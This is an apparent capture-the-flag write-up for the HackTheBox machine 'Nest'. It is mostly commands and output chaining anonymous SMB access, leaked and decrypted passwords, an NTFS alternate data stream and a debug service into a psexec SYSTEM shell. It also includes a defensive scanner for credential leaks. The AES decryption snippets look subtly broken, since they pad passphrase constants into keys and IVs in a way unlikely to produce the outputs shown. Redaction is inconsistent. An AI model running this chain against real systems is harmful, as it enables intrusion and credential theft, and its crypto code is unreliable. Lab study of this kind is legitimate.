Scope
- 10.10.10.178
NEST — HTB Write-up
Difficulty: Medium | OS: Windows | Category: Enumeration / Cryptography
Full Attack Chain
SMB null session → HR Welcome Email TempUser creds → NotepadPlusPlus config Secure$/IT/Carl path → VB project AES key → decrypt RU_config.xml c.smith hash → NTFS ADS debug password → HQK port 4386 DEBUG → navigate to HQK config → encrypted admin password → compile HqkLdap.exe → decrypt Administrator password → psexec SYSTEM
1. Reconnaissance
Why: Identify available services — Nest is a non-AD Windows box with only SMB and a custom reporting service exposed.
nmap -sC -sV -p- --min-rate 10000 -oA nmap/nest 10.10.10.178
Key findings: Port 445 (SMB) and port 4386 (HQK Reporting Service V1.2). No HTTP, no RDP, no WinRM. Domain: HTB-NEST.
PORT STATE SERVICE
445/tcp open microsoft-ds?
4386/tcp open HQK Reporting Service V1.2
AVAILABLE COMMANDS: LIST, SETDIR, RUNQUERY, DEBUG, HELP
2. SMB Null Session — Data Share Spidering
Why: SMB allows read access to the Data share without credentials. Recursive spidering finds embedded credentials in IT config files.
# Anonymous access
crackmapexec smb 10.10.10.178 --shares
smbclient -N //10.10.10.178/Data
# Spider full share
crackmapexec smb 10.10.10.178 -u '' -p '' -M spider_plus --share Data
Key finding: Data/Shared/Templates/HR/Welcome Email.txt
Username: TempUser
Password: welcome2019
3. SMB as TempUser — Extended Enumeration
Why: TempUser credentials expose additional files in the Data/IT tree and the Secure$ share.
crackmapexec smb 10.10.10.178 -u 'TempUser' -p 'welcome2019' --shares
crackmapexec smb 10.10.10.178 -u 'TempUser' -p 'welcome2019' -M spider_plus
Key find #1 — RU Scanner config with encrypted password:
<!-- Data/IT/Configs/RU Scanner/RU_config.xml -->
<Username>c.smith</Username>
<Password>fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=</Password>
Key find #2 — NotepadPlusPlus recently opened files:
<!-- Data/IT/Configs/NotepadPlusPlus/config.xml -->
<File filename="\\HTB-NEST\Secure$\IT\Carl\Temp.txt" />
Key finding: Carl's working directory is Secure$\IT\Carl. Although Secure$\IT itself cannot be listed, changing directory straight into the full path Secure$\IT\Carl succeeds.
4. Secure$ Share — VB Source Code
Why: Traversing directly into Secure$\IT\Carl\VB Projects reveals Visual Basic source code for the RU Scanner application, containing the AES encryption key used to protect passwords in config files.
smbclient //10.10.10.178/Secure$ -U 'TempUser%<REDACTED>'
smb: \> cd "IT\Carl\VB Projects\WIP\RU"
smb: \IT\Carl\VB Projects\WIP\RU\> ls
RU Scanner.sln
RU Scanner\Module1.vb
RU Scanner\Utils.vb
Utils.vb — AES key and IV:
Public Const AES_KEY As String = "N3st22"
Public Const AES_IV As String = "88552299"
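As an added defensive example (not code from the original write-up or from the RU Scanner project): a small Python scanner that flags, in a spidered share dump, the four leak types that sections 2 to 4 chain together: plaintext credentials in a document, a base64 `<Password>` element in a config file, a UNC hint pointing at another share, and crypto constants checked into source. All paths and values below are constructed samples, not the box's real data.

```python
import re

# Constructed sample share dump (not the box's real files): {relative path: content}.
SAMPLE_SHARE = {
    "Shared/Templates/HR/Welcome Email.txt":
        "Welcome aboard!\nUsername: NewHire\nPassword: Sample-Pass-01\n",
    "IT/Configs/RU Scanner/RU_config.xml":
        "<ConfigFile><Username>svc.sample</Username>"
        "<Password>AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8=</Password></ConfigFile>",
    "IT/Configs/NotepadPlusPlus/config.xml":
        '<File filename="\\\\FILESRV\\Secure$\\IT\\Someone\\notes.txt" />',
    "IT/Src/Utils.vb":
        'Public Const AES_KEY As String = "sample-key"\n'
        'Public Const AES_IV As String = "sample-iv-16byte"\n',
    "Shared/README.txt": "Nothing sensitive here.\n",
}

# Heuristics for the four leak types chained in this write-up. The last rule is
# deliberately loose (it would also flag a constant such as "DriveName").
RULES = [
    ("plaintext_credential",
     re.compile(r"(?im)^\s*(?:user(?:name)?|pass(?:word)?)\s*[:=]\s*(\S+)")),
    ("config_password_element",
     re.compile(r"(?i)<password>\s*([^<\s]+)\s*</password>")),
    ("unc_path_to_hidden_share",
     re.compile(r'\\\\[^\\\s"]+\\[^\\\s"]+\$')),
    ("hardcoded_crypto_constant",
     re.compile(r'(?i)\bConst\s+\w*(?:KEY|IV)\w*\s+As\s+String\s*=\s*"([^"]*)"')),
]
BASE64ISH = re.compile(r"^[A-Za-z0-9+/]{16,}={0,2}$")

def scan_text(path, text):
    """Return (path, rule, value) findings for one file's content."""
    findings = []
    for name, rx in RULES:
        for m in rx.finditer(text):
            value = m.group(1) if m.groups() else m.group(0)
            rule = name
            # A base64-looking <Password> is usually reversible encryption rather than a
            # hash: whoever finds the key (e.g. in checked-in source) recovers the secret.
            if name == "config_password_element" and BASE64ISH.match(value):
                rule = "config_password_base64"
            findings.append((path, rule, value))
    return findings

def scan_share(files):
    """Scan a {relative_path: content} mapping such as a spidered share dump."""
    return [f for path, text in files.items() for f in scan_text(path, text)]
```

Running `scan_share(SAMPLE_SHARE)` on the constructed dump yields six findings; pointing the same rules at a mounted share (read each file into the mapping) is the audit a file-server owner would run before an attacker does.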
5. Decrypt c.smith Password
Why: With the AES key and IV from the VB source, decrypt the base64 ciphertext from RU_config.xml.
import base64
from Crypto.Cipher import AES  # pycryptodome

# Key and IV constants as found in Utils.vb
key = b'N3st22'
iv = b'88552299'
# Pad key and IV to 16 bytes (AES-128 key, 16-byte block)
key = key.ljust(16, b'\x00')
iv = iv.ljust(16, b'\x00')
# Base64 ciphertext from RU_config.xml
ct = base64.b64decode('fTEzAfYDoz1YzkqhQkH6GQFYKp1XY5hm7bjOP86yYxE=')
cipher = AES.new(key, AES.MODE_CBC, iv)
# Strip trailing zero padding before decoding the plaintext
print(cipher.decrypt(ct).rstrip(b'\x00').decode())
Output: xRxRxPANCAK3SxRxRx
c.smith:<REDACTED>
6. SMB as c.smith — NTFS Alternate Data Stream
Why: c.smith has access to the Users/C.Smith share which contains the HQK Reporting directory. A critical file uses an NTFS Alternate Data Stream to hide the debug password.
smbclient //10.10.10.178/Users -U 'C.Smith%<REDACTED>'
smb: \> cd "C.Smith\HQK Reporting"
smb: \> allinfo "Debug Mode Password.txt"
Output:
stream: [::$DATA], 0 bytes
stream: [:Password:$DATA], 15 bytes
# Download ADS content
smb: \> get "Debug Mode Password.txt:Password"
$ cat "Debug Mode Password.txt:Password"
WBQ201953D8w
Also retrieved:
smb: \> get HQK_Config_Backup.xml
<HQKConfig>
<Domain>nest.local</Domain>
<Port>389</Port>
<User>Administrator</User>
<Password>yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=</Password>
</HQKConfig>
7. HQK Service — DEBUG Mode
Why: Port 4386 runs the proprietary HQK Reporting Service. The DEBUG command (using the password from the ADS) elevates to administrator mode, allowing filesystem traversal.
telnet 10.10.10.178 4386
HQK Reporting Service V1.2
> DEBUG WBQ201953D8w
Debug mode enabled. Use HELP to view available commands
> SETDIR \Users\C.Smith\HQK Reporting\AD Integration Module
> LIST
LDAPCrypto.dll
HqkLdap.exe
> RUNQUERY 1
Key finding: HqkLdap.exe and LDAPCrypto.dll are the LDAP integration module. The encrypted admin password in HQK_Config_Backup.xml uses the same encryption scheme — but with a different key embedded in HqkLdap.exe.
8. Reverse HqkLdap.exe — Decrypt Administrator Password
Why: The Administrator password in HQK_Config_Backup.xml is AES-encrypted. The decryption key is hardcoded in HqkLdap.exe / LDAPCrypto.dll. Download and decompile to extract the key.
# Download via SMB
smbclient //10.10.10.178/Users -U 'C.Smith%<REDACTED>'
smb: \> cd "C.Smith\HQK Reporting\AD Integration Module"
smb: \> get HqkLdap.exe
smb: \> get LDAPCrypto.dll
# Decompile with dnSpy / ILSpy
# Key found in HqkLdap source:
Public Const LDAP_KEY As String = "NeAr0n0uGainAlotOrW3T"
Public Const LDAP_IV As String = "814=u(r94G=HS-u8"
import base64
from Crypto.Cipher import AES  # pycryptodome

# Use the first 16 bytes of the constants found in HqkLdap.exe as AES-128 key and IV
key = b'NeAr0n0uGainAlotOrW3T'[:16]
iv = b'814=u(r94G=HS-u8'[:16]
# Base64 ciphertext from HQK_Config_Backup.xml
ct = base64.b64decode('yyEq0Uvvhq2uQOcWG8peLoeRQehqip/fKdeG/kjEVb4=')
cipher = AES.new(key, AES.MODE_CBC, iv)
# Strip trailing zero padding before decoding the plaintext
print(cipher.decrypt(ct).rstrip(b'\x00').decode())
Output: XtH4nkS4Pl4y1nGX
Administrator:<REDACTED>
9. PSExec — SYSTEM
Why: Administrator credentials grant full remote command execution via PSExec over SMB.
psexec.py administrator@10.10.10.178
Output:
C:\Windows\system32> whoami
nt authority\system
C:\Users\Administrator\Desktop> type root.txt
<REDACTED>
Attack Chain Summary
SMB null session → Data/Shared/Templates/HR/Welcome Email.txt
↓
TempUser:<REDACTED>
↓
SMB Data/IT/Configs/RU Scanner/RU_config.xml → c.smith AES ciphertext
SMB Data/IT/Configs/NotepadPlusPlus/config.xml → Secure$/IT/Carl path hint
↓
Secure$/IT/Carl/VB Projects/RU Scanner/Utils.vb → AES_KEY=N3st22, AES_IV=88552299
↓
Decrypt ciphertext → c.smith:<REDACTED>
↓
SMB Users/C.Smith/HQK Reporting/Debug Mode Password.txt:Password (NTFS ADS)
↓
Debug password: WBQ201953D8w
↓
SMB Users/C.Smith/HQK Reporting/HQK_Config_Backup.xml → Admin AES ciphertext
↓
HQK port 4386 → DEBUG WBQ201953D8w → download HqkLdap.exe
↓
dnSpy decompile HqkLdap.exe → LDAP_KEY/LDAP_IV
↓
Decrypt admin ciphertext → Administrator:<REDACTED>
↓
psexec.py administrator@10.10.10.178 → SYSTEM → root.txt ✓
ⓒ 0xNRG
Logs
SMB_spidering_2025-07-29_10-15-38.log